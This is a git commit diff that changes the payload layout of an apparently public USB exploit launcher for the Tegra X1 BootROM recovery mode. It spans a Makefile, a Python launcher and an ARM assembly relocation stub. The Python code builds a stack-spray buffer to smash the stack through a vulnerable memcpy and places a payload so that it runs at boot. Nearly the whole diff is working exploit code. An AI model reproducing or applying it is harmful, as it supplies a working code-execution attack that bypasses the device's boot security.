Restruct the payload, so it can fit more code

This commit is contained in:
trisz404 2018-05-02 16:10:51 +02:00
parent e7b42b9279
commit 9e0ed49e71
6 changed files with 45 additions and 24 deletions

View File

@ -25,27 +25,33 @@ LDFLAGS =
all: intermezzo.bin
# The start of the BPMP IRAM.
START_OF_IRAM := 0x40000000
# The new address of the Intermezzo after copy
INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000
# The address to which Intermezzo is to be loaded by the payload launcher.
INTERMEZZO_ADDRESS := 0x4001F000
INTERMEZZO_ADDRESS := 0x40010000
# The address we want the final payload to be located at.
RELOCATION_TARGET := 0x40010000
# The addrss and length of the data loaded by f-g.
LOAD_BLOCK_START := 0x40020000
LOAD_BLOCK_LENGTH := 0x20000
PAYLOAD_START_ADDR := 0x40010E40
STACK_SPRAY_START := 0x40014E40
STACK_SPRAY_END := 0x40017000
BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
AFTER_SPRAY_LENGTH := 0x30000
ENTRY_POINT_ADDRESS := 0x40010000
# Provide the definitions used in the intermezzo stub.
DEFINES := \
-DSTART_OF_IRAM=$(START_OF_IRAM) \
-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)
intermezzo.elf: intermezzo.o

View File

@ -32,8 +32,9 @@ import platform
# specify the locations of important load components
RCM_PAYLOAD_ADDR = 0x40010000
INTERMEZZO_LOCATION = 0x4001F000
PAYLOAD_LOAD_BLOCK = 0x40020000
PAYLOAD_START_ADDR = 0x40010E40
STACK_SPRAY_START = 0x40014E40
STACK_SPRAY_END = 0x40017000
# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@ -445,9 +446,6 @@ payload += b'\0' * (680 - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
payload += (intermezzo_location_raw * repeat_count)
# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
@ -458,15 +456,25 @@ with open(intermezzo_path, "rb") as f:
payload += intermezzo
# Finally, pad until we've reached the position we need to put the payload.
# This ensures the payload winds up at the location Intermezzo expects.
position = INTERMEZZO_LOCATION + intermezzo_size
padding_size = PAYLOAD_LOAD_BLOCK - position
# Pad the payload till the start of the payload
padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
payload += (b'\0' * padding_size)
# Read the payload into memory.
target_payload = b''
# Read the rest of the payload into memory.
with open(payload_path, "rb") as f:
payload += f.read()
target_payload = f.read()
# First part of the payload
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
payload += target_payload[:padding_size]
# Gap in the payload, stack spray
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)
# Read the rest of the payload into memory.
payload += target_payload[padding_size:]
# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.

View File

@ -8,15 +8,15 @@
_start:
// First, we'll need to move ourselves _out_ of the target area.
// We'll copy down into the start of the IRAM.
ldr r0, =START_OF_IRAM
// We'll copy down into the IRAM.
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
ldr r1, =post_relocation
ldr r2, =intermezzo_end
sub r2, r2, r1
bl copy
// Jump to the start of RAM, which should now contain the post-relocation code.
ldr r0, =START_OF_IRAM
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
bx r0
@ -25,8 +25,15 @@ post_relocation:
// Next, we'll copy our payload down to the appropriate relocaiton address.
ldr r0, =RELOCATION_TARGET
ldr r1, =LOAD_BLOCK_START
ldr r2, =LOAD_BLOCK_LENGTH
ldr r1, =PAYLOAD_START_ADDR
ldr r2, =BEFORE_SPRAY_LENGTH
bl copy
ldr r0, =RELOCATION_TARGET
ldr r1, =BEFORE_SPRAY_LENGTH
add r0, r0, r1
ldr r1, =STACK_SPRAY_END
ldr r2, =AFTER_SPRAY_LENGTH
bl copy
// Finally, jump into the relocated target.

Binary file not shown.

Binary file not shown.

Binary file not shown.